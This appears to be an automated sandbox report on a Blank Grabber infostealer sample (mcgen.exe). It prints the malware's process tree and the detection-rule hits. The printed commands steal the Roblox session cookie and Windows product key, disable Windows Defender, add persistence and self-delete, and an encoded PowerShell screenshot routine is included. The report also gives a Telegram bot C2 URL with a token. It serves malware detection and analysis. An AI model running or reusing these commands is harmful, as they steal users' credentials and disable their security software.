        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8044 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8052 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8076 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8152 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7428 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8180 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7740 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7184 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7804 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7580 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7236 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7256 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7612 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7060 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 2300 cmdline: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3820 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8172 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7964 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5360 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6564 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4188 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7488 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7284 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 6540 cmdline: ping localhost -n 3 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendMessage"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2124495523.0000024512162000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000002.00000003.2519812485.000002C54FAC3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000000.00000003.2124495523.0000024512164000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000002.00000002.2531278719.000002C54FC26000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 7 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", ProcessId: 6104, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 3196, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *", ProcessId: 7060, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe"", ProcessId: 7772, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\mcgen.exe, ProcessId: 7020, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkA